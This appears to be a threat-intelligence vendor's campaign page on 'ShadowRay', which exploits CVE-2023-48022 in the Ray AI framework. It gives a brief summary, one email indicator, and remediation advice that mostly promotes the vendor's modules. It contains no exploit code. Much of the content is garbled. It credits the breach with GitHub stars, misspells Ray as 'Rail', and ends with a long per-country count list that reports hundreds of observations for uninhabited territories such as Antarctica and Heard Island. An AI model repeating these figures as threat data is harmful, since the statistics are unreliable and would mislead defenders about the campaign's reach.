Campaigns
Unveiling the ShadowRay Campaign: Exploiting Critical Ray Framework Vulnerabilities to Target and Compromise AI Workloads Globally

Unveiling the ShadowRay Campaign: Exploiting Critical Ray Framework Vulnerabilities to Target and Compromise AI Workloads Globally

ShadowRayExposedRayUnderSiegePatchCVE202348022
Since September 5, 2023, the 'ShadowRay' campaign, led by anonymous hackers, has been exploiting a hidden vulnerability in the Ray framework to capture resources in the Education, Cryptocurrency and Biopharma sectors. Developed by Anyscale, Ray is crucial for scaling AI and Python applications used by large companies such as Amazon and OpenAI. This breach, which has garnered more than 30,500 stars on GitHub, indicates a significant threat in the field of cyber espionage. Researchers found that hundreds of exposed Ray servers were compromised via CVE-2023-48022, giving attackers access to sensitive information such as artificial intelligence models. environment variables, production database

Indicators of Compromise

fintagixgamesatgmail.com

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATIONS

Defense against ShadowRay

Researchers say they have alerted many companies that were breached using the Ray bug and provided assistance with remediation.


To secure Rail deployments, it is crucial to operate in a secure environment by enforcing firewall rules, adding authorization to the Ray Dashboard port, and constantly monitoring for anomalies.


Additionally, avoid using default settings such as binding to 0.0.0.0 and leverage tools that improve the security posture of clusters.


You can leverage SOCRadar's modules to secure Ray deployments against threats such as the ShadowRay campaign, based on the risk mitigation strategies outlined. Given SOCRadar's comprehensive suite of cybersecurity tools, the modules best suited for these strategies will include:


Cyber Threat Intelligence Platform: To continuously monitor new threats, vulnerabilities such as CVE-2023-48022, and Ray-related updates. This module can help you understand the threat landscape and prepare for potential cyberespionage campaigns targeting Ray deployments.


Digital Risk Protection (DRP): Scanning and monitoring digital assets to detect misconfigurations, compromised services, and unauthorized access attempts. This module can help identify exposed Ray instances or unauthorized access attempts to the Ray Dashboard port.


Secure Access Service Endpoint (SASE) or Firewall Management: Prevents unauthorized access to Rail deployments by efficiently managing firewall rules and security groups. This will be crucial for enforcing network security policies and restricting access to the Ray environment.


Vulnerability Detection While it has been noted that code scanning and misconfiguration tools may not detect attacks that exploit Ray's design, a vulnerability management tool can still play a critical role in identifying other vulnerabilities in the environment that can be exploited in conjunction with Ray.


Identity and Access Management (IAM): To add layers of authorization, especially if you are exposing the Ray Control Panel or API over the network. This module manages access controls, ensuring that only authorized users can interact with the Ray environment.


 Extended Threat Intelligence: Represents a cutting-edge evolution of the traditional threat intelligence platform, featuring advanced capabilities that offer superior threat detection and visibility. This state-of-the-art solution utilizes powerful machine learning technologies to analyze vast amounts of threat data sourced from a multitude of open sources, social media and the dark web. By leveraging this comprehensive approach, SOCRadar’s XTI can help security teams quickly identify and prioritize threats, providing them with proactive security.: Continuously monitors production environments and AI clusters for anomalies. This may include unusual network traffic patterns or unexpected behavior indicative of abuse or unauthorized activity on Ray.


Incident Response:For automating responses to detected threats and efficiently managing incident response efforts. Following the mentioned Incident Response plan will be key in quickly handling any security incident.


Given the unique nature of Ray's functionality and the unique challenges of securing it, leveraging a combination of these SOCRadar modules or services will provide a comprehensive approach to mitigating the risks associated with the ShadowRay campaign and similar cybersecurity threats.


Observed Countries250

AD (737)
AE (450)
AF (257)
AG (56)
AI (945)
AL (406)
AM (33)
AO (453)
AQ (954)
AR (383)
AS (71)
AT (223)
AU (804)
AW (144)
AX (170)
AZ (919)
BA (896)
BB (752)
BD (819)
BE (922)
BF (494)
BG (175)
BH (332)
BI (174)
BJ (7)
BL (350)
BM (906)
BN (372)
BO (264)
BQ (118)
BR (529)
BS (63)
BT (23)
BV (276)
BW (661)
BY (725)
BZ (356)
CA (798)
CC (31)
CD (359)
CF (726)
CG (309)
CH (621)
CI (980)
CK (660)
CL (487)
CM (541)
CN (859)
CO (373)
CR (220)
CU (216)
CV (261)
CW (874)
CX (535)
CY (594)
CZ (876)
DE (698)
DJ (17)
DK (677)
DM (401)
DO (417)
DZ (574)
EC (171)
EE (177)
EG (559)
EH (65)
ER (133)
ES (616)
ET (727)
FI (168)
FJ (216)
FK (641)
FM (698)
FO (684)
FR (619)
GA (894)
GB (919)
GD (409)
GE (85)
GF (925)
GG (985)
GH (179)
GI (235)
GL (63)
GM (409)
GN (925)
GP (651)
GQ (473)
GR (56)
GS (267)
GT (353)
GU (771)
GW (252)
GY (900)
HK (29)
HM (992)
HN (214)
HR (890)
HT (555)
HU (448)
ID (760)
IE (965)
IL (105)
IM (140)
IN (797)
IO (608)
IQ (862)
IR (779)
IS (452)
IT (52)
JE (734)
JM (345)
JO (723)
JP (861)
KE (170)
KG (928)
KH (83)
KI (279)
KM (499)
KN (865)
KP (745)
KR (640)
KW (136)
KY (512)
KZ (371)
LA (817)
LB (925)
LC (407)
LI (395)
LK (137)
LR (412)
LS (384)
LT (77)
LU (280)
LV (632)
LY (55)
MA (499)
MC (36)
MD (867)
ME (442)
MF (469)
MG (807)
MH (705)
MK (93)
ML (350)
MM (895)
MN (822)
MO (834)
MP (107)
MQ (156)
MR (1)
MS (934)
MT (664)
MU (432)
MV (317)
MW (152)
MX (916)
MY (918)
MZ (98)
NA (126)
NC (665)
NE (596)
NF (179)
NG (997)
NI (528)
NL (160)
NO (956)
NP (870)
NR (153)
NU (828)
NZ (445)
OM (36)
PA (629)
PE (183)
PF (99)
PG (302)
PH (957)
PK (797)
PL (168)
PM (218)
PN (672)
PR (420)
PS (240)
PT (256)
PW (107)
PY (958)
QA (5)
RE (270)
RO (21)
RS (280)
RU (492)
RW (329)
SA (1)
SB (610)
SC (178)
SD (836)
SE (29)
SG (626)
SH (573)
SI (584)
SJ (320)
SK (585)
SL (582)
SM (248)
SN (466)
SO (899)
SR (536)
SS (657)
ST (132)
SV (699)
SX (77)
SY (750)
SZ (348)
TC (363)
TD (130)
TF (894)
TG (12)
TH (156)
TJ (448)
TK (157)
TL (739)
TM (466)
TN (586)
TO (883)
TR (195)
TT (248)
TV (776)
TW (466)
TZ (906)
UA (753)
UG (119)
UM (105)
US (216)
UY (870)
UZ (742)
VA (298)
VC (731)
VE (726)
VG (920)
VI (520)
VN (454)
VU (985)
WF (608)
WS (610)
XK (179)
YE (45)
YT (745)
ZA (660)
ZM (279)
ZW (337)